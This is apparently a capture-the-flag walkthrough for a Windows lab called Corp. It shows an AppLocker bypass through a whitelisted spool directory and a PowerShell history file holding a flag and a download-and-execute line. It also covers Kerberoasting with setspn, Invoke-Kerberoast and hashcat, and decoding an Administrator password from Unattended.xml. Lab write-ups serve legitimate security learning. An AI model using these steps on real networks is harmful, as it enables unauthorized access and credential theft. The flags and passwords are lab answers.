Corp

Task 1 - Deploy the Windows machine

No need to answer!

Task 2 - Bypassing Applocker

Go ahead and use Powershell to download an executable of your choice locally, place it the whitelisted directory and execute it.

cd C:\Windows\System32\spool\drivers\color 

Just like Linux bash, Windows powershell saves all previous commands into a file called ConsoleHost_history. This is located at %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt. Access the file and and obtain the flag.

PS C:\Windows\System32\spool\drivers\color> gc C:\Users\dark\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
ls
dir
Get-Content test
flag{a12a41b5f8111327690f836e9b302f0b}
iex(new-object net.webclient).DownloadString('http://127.0.0.1/test.ps1'

Task 3 - Kerberoasting

Lets first enumerate Windows. If we run setspn -T medin -Q ​ */* we can extract all accounts in the SPN. SPN is the Service Principal Name, and is the mapping between service and account. Running that command, we find an existing SPN. What user is that for?

Now we have seen there is an SPN for a user, we can use Invoke-Kerberoast and get a ticket.

Lets use hashcat to bruteforce this password. The type of hash we're cracking is Kerberos 5 TGS-REP etype 23 and the hashcat code for this is 13100. Crack the hash. What is the users password in plain text?

To crack this hash, we can use hashcat tools.

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt --force

Login as this user. What is his flag?

Task 4 - Privilege Escalation

What is the decoded password?

c:\Users\fela.CORP>type C:\Windows\Panther\Unattend\Unattended.xml
<AutoLogon>
    <Password>
        <Value>dHFqSnBFWDlRdjh5YktJM3lIY2M9TCE1ZSghd1c7JFQ=</Value>
        <PlainText>false</PlainText>
    </Password>
    <Enabled>true</Enabled>
    <Username>Administrator</Username>
</AutoLogon>poe

Now we have the Administrator's password, login as them and obtain the last flag.